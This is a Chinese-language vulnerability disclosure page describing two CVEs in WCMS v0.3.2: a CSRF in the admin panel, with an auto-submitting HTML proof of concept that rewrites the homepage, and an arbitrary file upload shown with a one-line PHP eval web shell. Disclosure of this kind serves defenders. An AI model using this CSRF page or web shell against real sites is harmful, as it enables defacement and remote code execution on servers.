CVE中文申请站

CVE-2019-14240:WCMS v0.3.2后台管理页面存在CSRF漏洞

一、漏洞摘要

漏洞名称: WCMS v0.3.2后台管理页面存在CSRF漏洞
上报日期: 2019-07-12
漏洞发现者: Chen Wu
产品首页: http://wcms.space/
软件链接: https://github.com/vedees/wcms
版本: v0.3.2
CVE编号: CVE-2019-14240


二、漏洞概述

WCMS v0.3.2后台管理页面存在CSRF漏洞,管理员登陆后,打开下面poc.html可触发漏洞,篡改网站首页内容。
1.PNG

三、利用代码

当管理员登陆后,通过浏览器打开如下页面,可将首页内容改为hack test!
poc.html

<html>
  <head>
  <title> CSRF Proof</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/wex/html.php?finish=../index.html" method="POST">
      <input type="hidden" name="textAreaCode" value="hack test!" />
      <input type="hidden" name="codeEditor" value="" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/266/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14240
exploit-db:发布中

CVE-2019-11377:WCMS v0.3.2存在任意文件上传漏洞

一、漏洞摘要

漏洞名称: WCMS v0.3.2存在任意文件上传漏洞
上报日期: 2019-04-04
漏洞发现者: Yu Yang
产品首页: http://wcms.space/
软件链接: https://github.com/vedees/wcms
版本: v0.3.2
CVE编号: CVE-2019-11377


二、漏洞概述

在代码层上进行分析,发现该位置的上传功能,虽然建立有文件上传的白名单,但是并没有过滤掉充满风险的后缀(比如php)
1.png

三、利用方法

1.使用上传功能,在该CMS后台的 developer/finder模块
2.png
2.我们可以通过这个上传功能,上传任意后缀的文件到网站服务器上,这就导致攻击者可以上传恶意代码到服务器,以达到getshell的目的
3.png
POC(2.php):
<?php @eval($_POST[c]);?>
4.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/208/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11377
exploit-db:发布中